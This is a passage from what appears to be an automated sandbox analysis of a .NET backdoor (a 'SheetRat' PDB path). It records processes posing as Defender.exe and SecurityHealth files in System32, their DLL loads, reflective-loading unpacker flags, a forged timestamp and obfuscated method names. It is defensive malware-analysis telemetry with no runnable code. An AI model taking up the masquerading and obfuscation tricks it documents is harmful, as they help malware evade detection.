                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: version.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: version.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: version.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\Fixer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Fixer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Fixer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\SheetRat\SheetRat\bin\Release\Stub\UserMode.pdb source: 6z9uno0baqvej0me.exe, 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                      Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ
                      Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.cs.Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                      Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                      Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi
                      Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.cs.Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, XvtqplFAmRakHnvLtpT.cs.Net Code: KkakfDiBwfKYVVbOUQ
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, FeMXZbEkIGjJgevW.cs.Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.cs.Net Code: FyRyFitGWcSvLUVgQQryVi
                      Source: Defender.exe.3.dr, GprCBzVajSFPhcvMz.cs.Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                      Source: Fixer.exeStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_029CDD24 push esp; iretd 0_2_029CF149
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623F785 push edi; ret 0_2_0623F786
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C26D2 push FFFFFFE8h; ret 2_2_00007FFA1B3C26D9
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C00BD pushad ; iretd 2_2_00007FFA1B3C00C1
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D00BD pushad ; iretd 3_2_00007FFA1B3D00C1
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A26D2 push FFFFFFE8h; ret 13_2_00007FFA1B3A26D9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A00BD pushad ; iretd 13_2_00007FFA1B3A00C1
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3C00BD pushad ; iretd 20_2_00007FFA1B3C00C1
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3900BD pushad ; iretd 22_2_00007FFA1B3900C1
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D26D2 push FFFFFFE8h; ret 23_2_00007FFA1B3D26D9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D00BD pushad ; iretd 23_2_00007FFA1B3D00C1
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A00BD pushad ; iretd 24_2_00007FFA1B3A00C1
                      Source: 6z9uno0baqvej0me.exe.0.dr, jzPbPTOKMYzy.csHigh entropy of concatenated method names: 'BvqjRKKKxZ', 'uDiLLLnYqoyNDjxaBj', 'wrmnqWmDlFvylaogMkC', 'BkbHODinAUkJbTciHPsoYHCSv', 'MmOCkpyjdMQfZnozDQVlXS', 'GYxsNbthILYqvZxjuKrpQRcqF', 'ZElxJSupIe', 'xkIkeITAwsaGhaafcgowHm', 'BowLBFwFQTwxZi', 'mJJpIHzxEXj'
                      Source: 6z9uno0baqvej0me.exe.0.dr, YsWKUSVaFowa.csHigh entropy of concatenated method names: 'tTvXthIVExoTsvxLtZ', 'UtwrBhuHZMwXhFxGlCAkunm', 'vhqbXXOMOCFiwbtp', 'ajIHaHOvoMItpzhHbwUrSjByk', 'ezPJJJKkTDdM', 'acfiKFTZDYaUeZyh', 'iJXRcOgfCziEfddPbtOmBrs', 'iabooejMDcVUpDx', 'zCHFkVYvxFDfju', 'qQGiBmsqYPWBDHJaXvAnyj'
                      Source: 6z9uno0baqvej0me.exe.0.dr, BElgoLHogWQNwYHuUgCDSGRK.csHigh entropy of concatenated method names: 'baJZzPuRxNSmGjUn', 'WwdzYoCecRRlcvn', 'LNlxOgGVwyKpHOwiPA', 'VgVDlHuXycgVReLuWjpDp', 'HDZeMXNUjVcLStqJzqUIIt', 'dsKvTayZwufZRe', 'uXKetLtGMREM', 'yighOovmCbttlvfRmUZfr', 'xyezEkmydPNOaONyKdiVrvQk', 'PNoZxfgsClhC'
                      Source: 6z9uno0baqvej0me.exe.0.dr, xqLvAWoeLo.csHigh entropy of concatenated method names: 'CdUisxkdFkFeaDfLWDmvGKKb', 'BzDhNhZlzFIpfXjDqWRsL', 'rULSaZsqrTsxqxhwsCfsb', 'XWqgDsPosiYRHiWvHztJNowhg', 'VtePMSIswobuWAaDaJYYp', 'awvfzRliaJzRXVJdWFIPmhTMd', 'jJOmJHwWThTgTrHNOSvFdEu', 'nSQaMtdiCGibUnzrVBCcJpmRH', 'SBRYPfPRyqrVJaDle', 'JftaSDjbBRmyg'
                      Source: 6z9uno0baqvej0me.exe.0.dr, ETYzyWSLPrOWhkiLrBuXTiPY.csHigh entropy of concatenated method names: 'oOWCJmYcQnvjThiXoz', 'ihhMfqXbAabVEzYJI', 'JFEqtQwnbXULzejrptHBrLmL', 'CpSrkuXabftSsnQPr', 'zGoawmMJeCGFxT', 'TrbevrdxlYzpYxGqmzxnEib', 'ffaQUTWhaZZvplwXWJDCxwn', 'YMUFAfokPiyQR', 'cSCRPzYKBBCZR', 'fZvirOsIyQhukogGmgGJglAg'
                      Source: 6z9uno0baqvej0me.exe.0.dr, LRPADrZpfFFGcDsfIXCuiNHyQ.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'MVeqnrHUVu', 'JPRxKQjqNiQvhhLWOJIH', 'NtWrdHcWXWDpoPep', 'ZGRNcTvawIbVsLMnPvWvGhI', 'TpMNGsRhgWjB', 'FkaaRgzBBeKqCZTHtlrxKu', 'GiUDrtoWbKxJLwVpAJFSL', 'WDTyZmksEe', 'yTrxcIHMHifFP'
                      Source: 6z9uno0baqvej0me.exe.0.dr, PthsnsfGDgeBRScSJU.csHigh entropy of concatenated method names: 'WPvtoNyDLTEGaSogXzMEc', 'kzIqtnFcyd', 'EDdQWEFDXUaxCBQpXUsAf', 'VfvlxTKxiVbT', 'PLQAvHAFgJCFocyi', 'GcHvhxUkGltZ', 'EVjfBeGTwseCpVtgIqMPa', 'zMahNwQoWHgvEg', 'JbTboJkctscaExug', 'KpWWETQKDIWXW'
                      Source: 6z9uno0baqvej0me.exe.0.dr, BtukVaynkFNDYhxzrBxPukEK.csHigh entropy of concatenated method names: 'LDSFFMGTtUhoJCk', 'sLtZydnlXBapozRpkTKX', 'iftHjeNQKhzMhCYKlRh', 'hhDmQfuDrEprNCJ', 'ARPyZUMUacGwsfyCdGx', 'bHqEkJYGrH', 'essJTCiqMVjLoYxLMFnOGFJEs', 'KOQwFcTdcEzVfAuQlf', 'wCgmxLBEtsZjoRtrUZPPGrL', 'tMqanUqUdLwYecSlEXakCVLE'
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csHigh entropy of concatenated method names: 'LEZdqsNhpolJzZovnnEEjVKsk', 'dNRuNpUSUgxp', 'VETfseTjhBW', 'KvVPptgskOzQubwoh', 'IxxijAPqSNQ', 'wMuWCtzCfmQwUGED', 'RifCcsZacMVzybScNSnVY', 'CoeYVhANcvLGBflUT', 'VvZhdDhLxUGoQiM', 'fqYEWraOjZnranqtzUzczUK'
                      Source: 6z9uno0baqvej0me.exe.0.dr, nKgpeZgSTykSYtSbbSV.csHigh entropy of concatenated method names: 'wDxqnrGACQoWOIdDYryoSu', 'fvaMQMFUkvxj', 'NqBnSgQCKODPQODjTgXBu', 'vNfpnxwEaRYtqip', 'WmeGVgWwAxClQ', 'ZipuvnHcsSGGnm', 'XYVuIKkXoxOripqvKnMrqDv', 'BDttLzPtjGdYgqIEpKBxgw', 'mCXvSbuzTdisEQrLo', 'UHcLROUfHCfCyGFfGrnE'
                      Source: 6z9uno0baqvej0me.exe.0.dr, KUSnSKgmYFGAeAocidYkujJO.csHigh entropy of concatenated method names: 'dQTkcSfTfReMTMW', 'nbVGmtdTwMWaBBaKDUp', 'NCwnahzjKPORBEGInIgjnznQ', 'FRdqTJzXcSlfifFutJhxFYwv', 'XvoFGNOfrVPVsrG', 'tYmVdFcbptqGSr', 'UiYwNLRWFWzqKpYBRajL', 'KaoSTMQMWINAounTvtDcBgydO', 'lQsYfjfhKIjetyA', 'iOmqWulhWhfiy'
                      Source: 6z9uno0baqvej0me.exe.0.dr, QUoppAEiUBFBpPJBwNJfiPqyc.csHigh entropy of concatenated method names: 'XCJldFJktkEUIpCWsEd', 'VqhiakofQAepMKcCYjXArEW', 'wbFUcMXlVkJgUbLtQ', 'UsGPHxNAxJgdAQTIlyf', 'CEdsUcAvhxYejMke', 'hUHGcOOErjsNMpM', 'vcQONvexRSAkCt', 'gppDeXNZpPncsHiVHLQnkT', 'EmpKpJNdCywMXW', 'ipiCazaSmpixsZmFDNZkR'
                      Source: 6z9uno0baqvej0me.exe.0.dr, telTuMtmMwDpKCkMfRoN.csHigh entropy of concatenated method names: 'rIpEftCdsi', 'wFYJaLGHcSGHka', 'HsDemLphCVvPOTqI', 'NptFeblULhkjlAEd', 'lKZNwCHXWnevr', 'lJltvhPdRRKadExRUrmDhg', 'GQmmhInHYUtyazGIvwIs', 'CWYCaESmJnFF', 'fdJvhUdKlFkFXSOiqH', 'naDuNjHDVUPhntyTd'
                      Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csHigh entropy of concatenated method names: 'NqoQEpSsTwLvYLG', 'xShVFAtygovIPJLQgVcbDDWW', 'slwAsIRDrakyhLMxpjPu', 'dKlvODjesuvKn', 'OxyogdEXiaSyJP', 'OTHcXObKFdFiZzgonux', 'zrviQGGcKdQtTAebnhQynmsKb', 'fYBmeELReWXYMQIzAcMLOZUF', 'FdzKMykHUb', 'aYyMhCVHDPVzqomQyPhF'
                      Source: 6z9uno0baqvej0me.exe.0.dr, dSDmXFmcLQpf.csHigh entropy of concatenated method names: 'ziEklDxOoeZAgCB', 'dMTBarzvetSRkatBLDS', 'snqYEtpndmqDlxhEVdqHjJFrk', 'dOlYockDlpWvwgCLSsC', 'fmspfiNKNjhynY', 'bCFyNThLshagJF', 'rNpUAqVvsGPZpBHXH', 'QaIMtowybAHFBDEps'
                      Source: 6z9uno0baqvej0me.exe.0.dr, tGwhiEvIelEIF.csHigh entropy of concatenated method names: 'qbVYeRUeKDssh', 'pMIWvEsBuMeRjSQsQVFHT', 'oFjNrOwtopXJTSciMBTog', 'uMiCORmWmZSD', 'CmiNdFBXotZyyPiIE', 'eFfLXfoAeGRCxqQuavenpi', 'lFSIEPBDNikoxsrPCYd', 'uFlvihEpneQzvauFEW', 'lcCDUMCTCigbPMHkfTWaW', 'LQjRlsXxmKgor'
                      Source: 6z9uno0baqvej0me.exe.0.dr, bemziMhmpmMerLdV.csHigh entropy of concatenated method names: 'yWKGRtOTIcUqxtNSNbPM', 'VlsSCCkNTeEwH', 'asNKkYgakMwrszLdjNJ', 'clSoOreFoxQtpOmZ', 'RfoevAfVKJ', 'CquqnmCpaYvttbmmwDCeM', 'cSiUrhknSEhtDyDZFDMxz', 'VmuCINiRIfYQOcITvV', 'mFrLzYojXyy', 'OlAwvZoYWEBvCVm'
                      Source: 6z9uno0baqvej0me.exe.0.dr, mDQHYyyDgioFBJZV.csHigh entropy of concatenated method names: 'yJRtvjLKoz', 'uGmefcsTfwexqBNYFzT', 'CsUetdcqUExkzUJawJZZQFpE', 'MbrhLGKUDbBlIlCz', 'zayuyWsnbv', 'ufwCQKgBkJIynPwsIo', 'XXZOGPFZOFztjKkaYeyVxE', 'PtqcLfCdjz', 'XCUQqnKkSwkPZnDoYOKTqT', 'KVPnuuMbQuvnhFHnK'
                      Source: 6z9uno0baqvej0me.exe.0.dr, GwWhqodDdzluu.csHigh entropy of concatenated method names: 'IvIOGuRhWYFMuHjkQGxan', 'HaLHdRFAtRAByccwKJtZa', 'betVTtifxUzXoiDzRzbVeoLtI', 'ITvngOKKygNH', 'MSOUfCbousLstxESmTAMMlOjJ', 'kMdjWlJBODQUfqhSNbkunR', 'rMNNulbDfKs', 'OKKWairiBCSnKfu', 'nzPATGmXIYPQnAlKn', 'SHCEJLviEptaDOrEP'
                      Source: 6z9uno0baqvej0me.exe.0.dr, KZBUhkwxZIxgGTHyBUdIA.csHigh entropy of concatenated method names: 'qihQwZMWKRbXaA', 'vzbnqyYoZdKgkd', 'hekvjSnQoWkDygEi', 'GlGVCUJQRuInlscsokxnfRu', 'inQFuaIUvRay', 'AfKbfRYedCdIKJvHv', 'pqxmOEEVqlosUS', 'VoFnLzzVdElmxjRMMzD', 'HZNQGXKbmqliKepVqUjOq', 'ThdRGlZZcsQiVvao'
                      Source: 6z9uno0baqvej0me.exe.0.dr, yPMoFGhLUJIDtqrdoF.csHigh entropy of concatenated method names: 'AvNubljotLBITSjnNSJvirWcI', 'HgspljehAflVlDV', 'ozSAolKCeLeJRJZ', 'lJeCvDZRdmSDCrgFZPDWJ', 'dVWpKaEUPqGA', 'cZSWkaAXBSGAmeYjBFCb', 'fIgGtzNIWbxBIEgGsTw', 'kbDQpYvflNlE', 'FwRmQranOfrIzeZsd', 'mFStEFQQUDhX'
                      Source: 6z9uno0baqvej0me.exe.0.dr, MKCDlISAepQIcIwuZXoEk.csHigh entropy of concatenated method names: 'nHEaTzoWxQZ', 'AFjLdhQolFyaNVhcozCG', 'IXuzKpTMHs', 'jvIrKOuGnv', 'hJdNyRMiyOTerho', 'TsxcdMyrRMpRZ', 'vSGqplVwqBz', 'tmQRRKVCaNqSoVKmv', 'bvJtSAYBrDqWCwcESMbAv', 'vWdhcoBUajAEZEPATPs'
                      Source: 6z9uno0baqvej0me.exe.0.dr, iEyzZzYuVgHBHuvSVDszSVn.csHigh entropy of concatenated method names: 'DmzaqXtfORSlWFCGyP', 'lfPhiSWydevaNQWwnzxExmcnp', 'JwQAlBCYBwnFRITZQB', 'rFUAJPGAKzzDcrG', 'aicsuXpPaIii', 'lYWbUyWovHlfBrYBtKNLzs', 'nIYTQFZAhXLZbdbItjTearM', 'gQNhyUXpshjSvfGjWHDHqRx', 'RCTcfNQvvfmzrsCMA', 'gtuJMOckITnFCOTp'
                      Source: 6z9uno0baqvej0me.exe.0.dr, DablsyKhVktwZXmMx.csHigh entropy of concatenated method names: 'GJKVxgQvPV', 'ydsOfJeQCVbYa', 'jderwMUjgNj', 'hdvVwjoVWGAitO', 'vuhfkkRNDlDS', 'sOwefQcBVhYr', 'FiccwyhFZpziyfQPrjtQf', 'HKWCdmGZMInzejlbpF', 'ESZwwglLleyfbFcaSGtUv', 'zcruyAgeQunfbKhNZWraUvOdM'
                      Source: 6z9uno0baqvej0me.exe.0.dr, IGWfOAHKzj.csHigh entropy of concatenated method names: 'INjbkoTBDyDO', 'wmyuTvpUiWQ', 'AqsFUenQBM', 'jQbBhUpDFsQjcCMqDunZrTYk', 'bwjUQxEkrOeruIAtSLKjHQCIo', 'WOmDPsrEFYFjpvLyknhzJ', 'nfYHNBqLubgfaqxoymzqC', 'njWPXIgOaoblaGeIeq', 'udeDJVVBvovzTj', 'rpkydhffArEoP'
                      Source: 6z9uno0baqvej0me.exe.0.dr, MLOzRvMQYDeslGhSiqRrD.csHigh entropy of concatenated method names: 'CNbGrDSdnbyQMNsuzSIDmHHwh', 'OvZLrOhNIBYL', 'IyuQCtVtTZn', 'zizMvGeYkpWEckjizFqVoOA', 'rrECLNvVlUr', 'hBNvtmSTbqoSJnuOjSC', 'iuUDBcMXuBSHsEBysvbCv', 'eBDltYShmTSGwngJtRZ', 'ZZXgaFmwVnqAqCPSzPjnENPz', 'mHNRiCJczHEeWLnmWLzcSQ'
                      Source: 6z9uno0baqvej0me.exe.0.dr, wEmPlHwvhkVaXVXBaeahaqAX.csHigh entropy of concatenated method names: 'mVGvXKixJGKPShLgxTQRR', 'DSxNmbKUFEOd', 'lqAJZncNPNmHwPAcXkGTdSoxK', 'GnpAGApjZqxJqeown', 'LFpMJriUIJV', 'CCzBgpYPGlSNpKfO', 'cfhejlEiudxSmsfNGouJpxzX', 'yamcXzMTageopTRvS', 'LaxUtnzjVlFEefJGlLSGW', 'kyLLAZQVdOXKnxbdgzc'
                      Source: 6z9uno0baqvej0me.exe.0.dr, VyUkcpVGFrRjScwyVUzGJWx.csHigh entropy of concatenated method names: 'OePLlmVmuhYaBYdb', 'gqiCsQpYwtMwaj', 'BxVxZJVTVeolEVwxrXrcgPUVO', 'notJpUyZZECfCFLXMX', 'fkCAwVYiGSl', 'AjzWgZMpUnewsuLVmRI', 'wRjpkownQm', 'GnaCwCifxzijrFGHBKDwpKj', 'iAKlrcZYivYIRsPTElKC', 'hrjegvdNpCwEtT'
                      Source: 6z9uno0baqvej0me.exe.0.dr, wdeXDEGcBGXHfb.csHigh entropy of concatenated method names: 'jqVCxngNkCJLbpWAhWqYuD', 'xyOjvRjBjAzlFnTqcQPtVutem', 'GploDvgqXDiDkvBAZLb', 'RMOfNIfJeCF', 'xQLtQvwEFOPPHZfTsUVhC', 'NtbFavQWMUxzGUkHkeOX', 'CxyYocLRKhXhODRSKUBoiCuSI', 'LjljqTfjLwdhlSE', 'BnZRrQTpaJN', 'QzCgPWRcgaqEBfsUpcii'
                      Source: 6z9uno0baqvej0me.exe.0.dr, YgTRUqGyvMDPAwIs.csHigh entropy of concatenated method names: 'fLfZnpCMphhn', 'QYIhRtBHNJYx', 'aZFOqCvjkyFwkrREfJYK', 'vfHTfOrARCGcHOcHbqesZ', 'ZDkgCjCizznueuyvLnDj', 'wyUdcoxESuSNOFD', 'yMIyiCHpNkiIgfqoqOdF', 'DavFehFUgPouMMb', 'ljtqfQrFoYnDdXAbxRumMsEU', 'UgVtNTSPsF'
                      Source: 6z9uno0baqvej0me.exe.0.dr, rLSyZeyiGXQodFFJuqzb.csHigh entropy of concatenated method names: 'jiyzoISeTlwlTJHcrob', 'USYqMKRKXONmGEIdT', 'kWfDmmUCJvyhCCXCIQJHndrHH', 'XJeOBdItDFt', 'fmWJBVMqMKPDwrT', 'LGfXvhOKYuuUY', 'ySJrkXlecVvR', 'NuaSKKwiwZWWyXLlHbsRDMx', 'FGwbheKbdoBQxbkKcbBtmUmA', 'sUuCAqAxgNDNVASPu'
                      Source: 6z9uno0baqvej0me.exe.0.dr, UsOroEkJQwDdcBlH.csHigh entropy of concatenated method names: 'tZXWLhbpGPMmxia', 'gBfOIplZEVfpAhsPo', 'gTNzJKmBhpYXSO', 'DvzGsJEoySqClpZWwxj', 'GMhsVbHHwA', 'CRLwltJwEbePhTIBLISc', 'jMWrOHlQCwrxkolZt', 'dmAfabwzYMavzeYHTFpEWl', 'gCfnSxfWbSUoqYDmu', 'PiYpGwNYcUgkpQsNUduoeCtq'
                      Source: 6z9uno0baqvej0me.exe.0.dr, OdvZLjiZSxuvnfJkBWEwenrQv.csHigh entropy of concatenated method names: 'fijjjKQXRKunlovkWbVST', 'LZySRCSamfdbDzqjOj', 'QOzqOlQAtRPudQCWKkQ', 'NEqXPJJkwumNlnDOMjkhBCZ', 'XkAKBcgzxqRL', 'cbFbgDyeBJpNnKbAj', 'LehAeIziTOnQvWrqkIfFVya', 'VbKwNSFzNyFgqcwwcxk', 'rlNTWxaSVeWNEDeCxCUBJ', 'CwQKAHLidYNqmjOraQrmdj'
                      Source: 6z9uno0baqvej0me.exe.0.dr, GcBxRdNtfCWHQtExiPKZUa.csHigh entropy of concatenated method names: 'UoExhHdtqM', 'UOdaJDZllFLdPIOCZ', 'ESTgchINgf', 'CJgurZpUIFGAjovILppSE', 'qmuFomvRwXt', 'iwfiXjYiQx', 'RkrgZxXqMgzStzlkDYqIiHiFy', 'cRGuWmspdUwFWUYggT', 'dmjmyVKapOKCmiwUGkSK', 'ZEWQoxBWjBaOV'
                      Source: 6z9uno0baqvej0me.exe.0.dr, lQeQOakgBgLnYzXnYfwvsoR.csHigh entropy of concatenated method names: 'ztAfILOSPvBxRhPeW', 'MOeRMzlJYbiMAxz', 'RUaFYpRtYdy', 'WrPRZbbCvihAtymmk', 'uExMQuEQsX', 'ksiBLnhMQnYVxJimZMZCeIVit', 'JaUNIjEFKpyzhLFaUO', 'iADiIeETUScXAHje', 'rCfpRrzsnaeO', 'DoGMLbGsMiDQjmiSyrxhyjRjg'
                      Source: 6z9uno0baqvej0me.exe.0.dr, QKvpyubntApnPp.csHigh entropy of concatenated method names: 'hJIcmsLfiJhZvvAbDBp', 'EspKISPavnCRQTuIAPHUFeMfR', 'fssYmmasapUyUTdk', 'vGQIcAsanuVsafJtmmWhX', 'QrXtFoCunr', 'uRZAMDsAxysEAAJK', 'hgGDNtqZliv', 'YsGdXfOksaj', 'hZDYmWtvexNGkRhXjba', 'xwZFlbcUvaMHxcVo'
                      Source: 6z9uno0baqvej0me.exe.0.dr, UyrKerXTOPAkHBLRj.csHigh entropy of concatenated method names: 'xHcODEjHiYWqy', 'EJpsKwGfhupd', 'CWdwiUYXYwGunaX', 'zwXQtgyMSHnF', 'aiYamglEcoWajfM', 'xWVjWixRMYWYRdbhSFyO', 'UBulEWIBpJBldVkRWvrk', 'NNKMnyMpHegy', 'cVbxSLpQXO', 'moIqPwJGdaGnkZQY'
                      Source: 6z9uno0baqvej0me.exe.0.dr, DyVsvFOlHVfMrKKxFhxnMGPwa.csHigh entropy of concatenated method names: 'UOBIcuNOdorNUcDDOJeNW', 'qYfMcxmwjYSJ', 'zjzslzdhWFsNVkIsGRNPM', 'ccPRPbgETvKrDUPQt', 'taUTnzHNdEdHFu', 'cGWdTkCARmxCdhocp', 'zVlDJpQJCxcbMpQSb', 'snadrZDgqxdgpb', 'jFYnYxhMJhEYpaHmKFbkBx', 'eLzczTgVIAncjrfC'
